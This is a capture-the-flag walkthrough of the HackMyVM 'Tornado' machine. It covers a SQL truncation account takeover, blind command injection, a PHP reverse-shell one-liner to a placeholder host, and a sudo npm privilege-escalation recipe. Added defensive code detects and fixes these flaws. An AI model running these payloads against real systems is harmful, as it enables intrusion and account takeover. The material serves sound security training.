Now, as always, let's start with an nmap scan.
Enumeration
# Nmap 7.91 scan initiated Wed Dec 30 10:01:46 2020 as: nmap -sC -sV -p22,80 -oN nmap IP
Nmap scan report for tornado (IP)
Host is up (0.00064s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0f:57:0d:60:31:4a:fd:2b:db:3e:9e:2f:63:2e:35:df (RSA)
| 256 00:9a:c8:d3:ba:1b:47:b2:48:a8:88:24:9f:fe:33:cc (ECDSA)
|_ 256 6d:af:db:21:25:ee:b0:a6:7d:05:f3:06:f0:65:ff:dc (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:45:15:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 30 10:01:53 2020 -- 1 IP address (1 host up) scanned in 7.62 seconds
Once we visit the website we see the Apache2 default page, so let's fire up gobuster and enumerate port 80.
gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt
/index.html (Status: 200)
/manual (Status: 301)
/javascript (Status: 301)
/bluesky (Status: 301)
/server-status (Status: 403)
We have a /bluesky directory, but nothing special there... hmm. Let's enumerate this one.
gobuster dir -q -u http://$ip/bluesky -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt
/index.html (Status: 200)
/contact.php (Status: 302)
/about.php (Status: 302)
/login.php (Status: 200)
/signup.php (Status: 200)
/css (Status: 301)
/imgs (Status: 301)
/js (Status: 301)
/logout.php (Status: 302)
/dashboard.php (Status: 302)
/port.php (Status: 302)
We can see a login page.
Let's have a look at the source code:
<input type="text" name="uname" placeholder="email" maxlength="13"><br><br>
<input type="password" name="upass" placeholder="password"><br><br>
<input type="submit" value="Login" name="btn" class="button"><br>
We can see that the maximum character length is 13.
There was another signup.php page. Have a look at it and sign up.
In the dashboard we can navigate between Home, About and Portfolio. Only the Contact page cannot be viewed: the comment feature has been turned off for security purposes. In the source code of "Portfolio" we find a hint.
Hmm... interesting! Let's check it out.
I tried an LFI to reach the imp.txt file but got nothing. Then I remembered that an alias can be created in the Apache config file, and that in Linux cd ~user means the home directory of that user, so I gave ~tornado a try and found imp.txt.
imp.txt
ceo@tornado
cto@tornado
manager@tornado
hr@tornado
lfi@tornado
admin@tornado
jacob@tornado
it@tornado
sales@tornado
We find several email addresses, and I tried them all against the login with the rockyou wordlist.
The only password I found was admin@tornado:hello
But that turned out to be a rabbit hole... we don't find anything new after logging in.
Do you remember the maximum character length of 13?
This brings me to the SQL truncation attack.
The SQL truncation vulnerability is a very interesting flaw in how the database handles over-long input: when the submitted value is longer than the column and the server is not in strict mode, the value is silently cut down to the column length on insert, while the application's duplicate check ran against the full value. Successful exploitation leads to user account compromise, as it means an attacker can register a second row for an existing user and then access that user's account with their own password. Sounds interesting!
<input type="text" name="uname" placeholder="email" maxlength="13">
Change the maxlength from 13 to 15:
<input type="text" name="uname" placeholder="email" maxlength="15">
Let's not waste time: register with the email jacob@tornado followed by one space and one extra character.
So we registered jacob from this form and then logged into the application. "Welcome User jacob@tornado" confirms that the login succeeded.
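To make the truncation mechanism concrete, here is an added example (not code from the write-up or from the Tornado machine) that replays the scenario above against an in-memory SQLite database. It assumes the backing email column is 13 characters wide, matching the form's maxlength. SQLite does not truncate VARCHAR values, so the silent truncation of a non-strict MySQL server is emulated explicitly inside vulnerable_register(). The hardened_register() variant shows the fix: validate the length server-side, never trust the client-side maxlength, and put a UNIQUE constraint on the column. Passwords are stored as plain strings only to keep the demo short.

```python
import sqlite3

# Assumption: the column behind the "email" field is as wide as the form's maxlength.
EMAIL_COLUMN_LENGTH = 13


def make_db():
    """Two in-memory tables: the legacy one and a hardened one with a UNIQUE email."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email VARCHAR(13), password TEXT)"
    )
    conn.execute(
        "CREATE TABLE users_hardened "
        "(id INTEGER PRIMARY KEY, email VARCHAR(13) UNIQUE, password TEXT)"
    )
    return conn


def vulnerable_register(conn, email, password):
    """Legacy flow: duplicate check on the full value, INSERT truncated by the server."""
    if conn.execute("SELECT 1 FROM users WHERE email = ?", (email,)).fetchone():
        return "exists"
    # Emulates a non-strict MySQL server cutting the value to the column width.
    stored = email[:EMAIL_COLUMN_LENGTH]
    conn.execute("INSERT INTO users (email, password) VALUES (?, ?)", (stored, password))
    return "created"


def vulnerable_login(conn, email, password):
    """Returns the matched email or None; any row with that email/password pair wins."""
    row = conn.execute(
        "SELECT email FROM users WHERE email = ? AND password = ?", (email, password)
    ).fetchone()
    return row[0] if row else None


def hardened_register(conn, email, password):
    """Fixed flow: server-side length check plus a UNIQUE constraint as a backstop."""
    email = email.strip()
    if not email or len(email) > EMAIL_COLUMN_LENGTH:
        return "rejected"
    try:
        conn.execute(
            "INSERT INTO users_hardened (email, password) VALUES (?, ?)", (email, password)
        )
    except sqlite3.IntegrityError:
        return "exists"
    return "created"


def run_demo():
    """Replays the write-up's scenario and returns each outcome for inspection."""
    conn = make_db()
    results = {
        "victim_signup": vulnerable_register(conn, "jacob@tornado", "jacobs-secret"),
        # 13 characters, then one space and one extra character, as in the write-up.
        "attacker_signup": vulnerable_register(conn, "jacob@tornado x", "attacker-pw"),
        "attacker_login_as_jacob": vulnerable_login(conn, "jacob@tornado", "attacker-pw"),
        "hardened_victim_signup": hardened_register(conn, "jacob@tornado", "jacobs-secret"),
        "hardened_attacker_signup": hardened_register(conn, "jacob@tornado x", "attacker-pw"),
        "hardened_exact_duplicate": hardened_register(conn, "jacob@tornado", "attacker-pw"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name}: {outcome}")
```

The duplicate check passes because "jacob@tornado x" really is a new value; the row that ends up in the table, however, carries the truncated "jacob@tornado", and the login query then happily matches the attacker's password against it. With strict SQL mode enabled on a real MySQL server the INSERT would fail instead of truncating, which is the server-side counterpart of the length check shown here.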
We find a comment field on the contact page that was not available before.
Here's the tricky part: if you run the id command in the contact page's comment field, it will not show you any output. Using the sleep 30 command it was confirmed that this is an RCE vulnerability, just one without visible output.
Use a PHP reverse shell and start a Netcat listener.
php -r '$sock=fsockopen("Ip",Port);exec("/bin/sh -i <&3 >&3 2>&3");'
www-data@tornado:/var/www/html/bluesky$ whoami && id
whoami && id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@tornado:/var/www/html/bluesky$
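Because the injection gives no output, the only trace the sleep 30 confirmation leaves on the server side is a request that took about thirty seconds to serve. The following added example (my own code, not part of the write-up) shows how a defender would spot that in Apache logs. It assumes the LogFormat "%h %l %u %t \"%r\" %>s %b %D", where %D is the serve time in microseconds, and the log lines are constructed for the demo.

```python
import re
import statistics

# Assumed Apache LogFormat: "%h %l %u %t \"%r\" %>s %b %D" (%D = microseconds to serve).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<micros>\d+)$'
)

# Constructed sample lines, not real logs from the machine.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Dec/2020:10:20:01 +0000] "POST /bluesky/contact.php HTTP/1.1" 200 1532 8431
10.0.0.5 - - [30/Dec/2020:10:20:05 +0000] "POST /bluesky/contact.php HTTP/1.1" 200 1532 9120
10.0.0.7 - - [30/Dec/2020:10:20:30 +0000] "GET /bluesky/about.php HTTP/1.1" 200 2210 5010
10.0.0.5 - - [30/Dec/2020:10:21:11 +0000] "POST /bluesky/contact.php HTTP/1.1" 200 1532 30008112
10.0.0.5 - - [30/Dec/2020:10:21:40 +0000] "POST /bluesky/contact.php HTTP/1.1" 200 1532 8790
"""


def parse_log(text):
    """Parses matching lines into dicts and converts the serve time to seconds."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["seconds"] = int(entry["micros"]) / 1_000_000
            entries.append(entry)
    return entries


def find_slow_outliers(entries, min_seconds=5.0, factor=50.0):
    """Flags requests that took at least min_seconds AND at least factor times the
    median for the same method+path. A 30 s sleep against a form that normally
    answers in milliseconds satisfies both; a generally slow endpoint does not."""
    by_endpoint = {}
    for e in entries:
        by_endpoint.setdefault((e["method"], e["path"]), []).append(e["seconds"])
    findings = []
    for e in entries:
        median = statistics.median(by_endpoint[(e["method"], e["path"])])
        if e["seconds"] >= min_seconds and e["seconds"] >= factor * median:
            findings.append(
                {
                    "ip": e["ip"],
                    "path": e["path"],
                    "seconds": round(e["seconds"], 3),
                    "endpoint_median": round(median, 3),
                }
            )
    return findings


if __name__ == "__main__":
    for f in find_slow_outliers(parse_log(SAMPLE_LOG)):
        print(f)
```

The POST body (and therefore the injected comment) never reaches the access log, so timing is all this rule can see; pairing it with application-level logging of the comment field, or a request-body inspecting module such as ModSecurity, gives the content to go with the timing.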
sudo -l
(catchme) NOPASSWD: /usr/bin/npm
npm is a package manager for the JavaScript programming language.
First I created an index.js file:
cd /tmp
mkdir shell
echo 'module.exports = install could be dangerous' > index.js
cp index.js shell
Now we need a package.json file, and chmod to make it executable.
{
  "name": "shell",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "shell": "/bin/bash"
  },
  "author": "",
  "license": "ISC"
}
Finally, execute the script with the command:
sudo -u catchme npm run-script shell
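The root cause here is a sudo rule that lets www-data run a package manager as catchme without a password, and npm will execute whatever the package.json scripts say. An administrator can catch such rules before an attacker does. The following is an added example (my own code, not from the write-up), a small auditor for sudo -l style output: it parses the rule lines, skips the header lines sudo prints, and flags rules whose target binary can run arbitrary commands. The binary set is illustrative, a handful of names I know from the GTFOBins sudo list (npm, the one on this page, among them); extend it from the current list for real use. The sample output is constructed.

```python
import re

# Illustrative set of binaries that can run arbitrary code for the run-as user
# (a subset of the GTFOBins "sudo" category from memory; extend for real audits).
SCRIPT_RUNNERS = {
    "npm", "node", "python", "python3", "perl", "ruby", "bash", "sh",
    "vi", "vim", "less", "more", "find", "awk", "env",
}

# One sudoers rule as printed by `sudo -l`: "(runas) [TAG: ...] command".
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")

# Constructed sample in the shape of `sudo -l` output; not the machine's real output.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on tornado:
    env_reset, mail_badpass

User www-data may run the following commands on tornado:
    (catchme) NOPASSWD: /usr/bin/npm
    (root) /usr/bin/id
    (ALL : ALL) ALL
"""


def audit_sudo_rules(lines):
    """Returns (rule, runas_user, reason) for every rule worth a second look."""
    findings = []
    for raw in lines:
        line = raw.strip()
        m = RULE_RE.match(line)
        if not m:
            continue  # header/defaults lines are not rules
        runas = m.group("runas").strip()
        nopasswd = "NOPASSWD" in m.group("tags")
        cmd = m.group("cmd").strip()
        if cmd == "ALL":
            findings.append((line, runas, "unrestricted ALL"))
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SCRIPT_RUNNERS:
            reason = f"{binary} can run arbitrary code as {runas}"
            if nopasswd:
                reason += " without a password"
            findings.append((line, runas, reason))
    return findings


if __name__ == "__main__":
    for rule, runas, reason in audit_sudo_rules(SAMPLE_SUDO_L.splitlines()):
        print(f"{rule:45s} -> {reason}")
```

The fix on the sudo side is to grant only the specific npm invocation that is needed (fixed arguments, a dedicated wrapper script, or a different user entirely) rather than the bare binary, since any rule that hands over an interpreter or a build tool effectively hands over the run-as account.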
I enumerated a lot but I really didn't find anything exploitable.
In the home directory of catchme, you will find a python script called enc.py
It's a keyed Caesar cipher, similar to ROT13.
Find the encrypted string inside and either rewrite the code, or go to this website (http://rumkin.com/tools/cipher/caesar-keyed.php) and enter each letter individually.
Example: a, b, c, d, e…
Once you have done it correctly, you will find the root password :)
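Since enc.py is not reproduced here, the following is an added example of my own, not the machine's script, implementing the generic keyed Caesar cipher the write-up refers to. It assumes the common convention: the key's distinct letters are placed first, the unused letters follow in alphabetical order, and the result is shifted like a plain Caesar cipher; with an empty key and shift 13 it degenerates to ROT13, which is the similarity the write-up mentions. substitution_table() produces the letter-by-letter mapping (a, b, c, ...) that the write-up builds by hand on the website; the exact key and shift used by enc.py are not on this page, so read them from the script itself.

```python
import string

ALPHABET = string.ascii_lowercase


def keyed_alphabet(key):
    """Cipher alphabet: the key's distinct letters first, then the unused letters in order."""
    seen = []
    for ch in key.lower():
        if ch in ALPHABET and ch not in seen:
            seen.append(ch)
    return "".join(seen) + "".join(c for c in ALPHABET if c not in seen)


def substitution_table(key, shift):
    """Plain letter -> cipher letter, the table built by entering a, b, c, ... one at a time."""
    cipher = keyed_alphabet(key)
    return {p: cipher[(i + shift) % 26] for i, p in enumerate(ALPHABET)}


def _apply(text, table):
    """Applies a letter mapping, keeping case and leaving non-letters untouched."""
    out = []
    for ch in text:
        low = ch.lower()
        if low in table:
            mapped = table[low]
            out.append(mapped.upper() if ch.isupper() else mapped)
        else:
            out.append(ch)
    return "".join(out)


def encrypt(text, key, shift):
    return _apply(text, substitution_table(key, shift))


def decrypt(text, key, shift):
    inverse = {c: p for p, c in substitution_table(key, shift).items()}
    return _apply(text, inverse)


if __name__ == "__main__":
    # Constructed demo values; the real key/shift live in the machine's enc.py.
    key, shift = "tornado", 13
    for p, c in substitution_table(key, shift).items():
        print(f"{p} -> {c}")
    secret = encrypt("Hello, World!", key, shift)
    print(secret, "->", decrypt(secret, key, shift))
```

Because the mapping is a fixed substitution, decrypting is just inverting the table; if enc.py turns out to apply its shift to the keyed alphabet in a different order, only substitution_table() needs to change.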
Tornado was created by catch_me75 (thank you).
This machine can be found at HackMyVM.
--> Check it out!